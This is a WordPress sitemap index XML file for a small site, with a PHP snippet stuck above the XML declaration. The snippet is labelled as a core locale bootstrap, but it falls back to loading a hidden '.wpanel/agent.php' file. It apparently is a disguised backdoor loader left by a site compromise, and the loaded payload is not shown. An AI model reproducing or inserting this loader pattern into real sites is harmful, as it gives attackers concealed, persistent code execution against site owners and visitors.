
// wp-core-locale-bootstrap
$_wp_locale_data = __DIR__ . '/languages/class-wp-locale-data.php';
if (!is_file($_wp_locale_data)) {
    $_wp_locale_data = __DIR__ . '/upgrade/class-wp-locale-data.php';
}
if (!is_file($_wp_locale_data)) {
    $_wp_locale_data = __DIR__ . '/.wpanel/agent.php';
}
if (is_file($_wp_locale_data)) {
    require_once $_wp_locale_data;
}
﻿<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://alignedmindmft.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://alignedmindmft.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://alignedmindmft.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://alignedmindmft.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://alignedmindmft.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
